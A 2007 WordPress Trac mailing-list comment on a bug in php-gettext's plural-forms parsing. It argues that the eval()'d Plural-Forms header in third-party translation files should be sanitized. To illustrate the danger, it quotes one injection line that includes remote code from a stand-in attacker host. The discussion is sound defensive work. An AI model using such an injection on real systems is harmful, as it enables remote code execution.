[wp-trac] Re: [WordPress Trac] #4005: php-gettext's plural forms
parsing is broken for nplurals>2
WordPress Trac
wp-trac at lists.automattic.com
Sat Mar 24 11:18:07 GMT 2007
#4005: php-gettext's plural forms parsing is broken for nplurals>2
------------------------------+---------------------------------------------
Reporter: moeffju | Owner: ryan
Type: defect | Status: new
Priority: high | Milestone: 2.2
Component: i18n | Version: 2.1.2
Severity: normal | Resolution:
Keywords: has-patch commit |
------------------------------+---------------------------------------------
Comment (by moeffju):
I wrote that chunk of code for Habari, and just ported it over to php-
gettext/wordpress. Sanitizing the plural-forms header seems reasonable
since it will be eval()'d with only minor changes, and it is user-supplied
data; in theory you could put something there like
`include('http://evil.com/backdoor.php')`. Since the file format is binary
and WP translations are usually supplied by third parties, the input
should be treated as user input and sanitized thusly.
Re nbachiyski, good catch, although multiple semicolons should not matter.
--
Ticket URL: <http://trac.wordpress.org/ticket/4005#comment:8>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list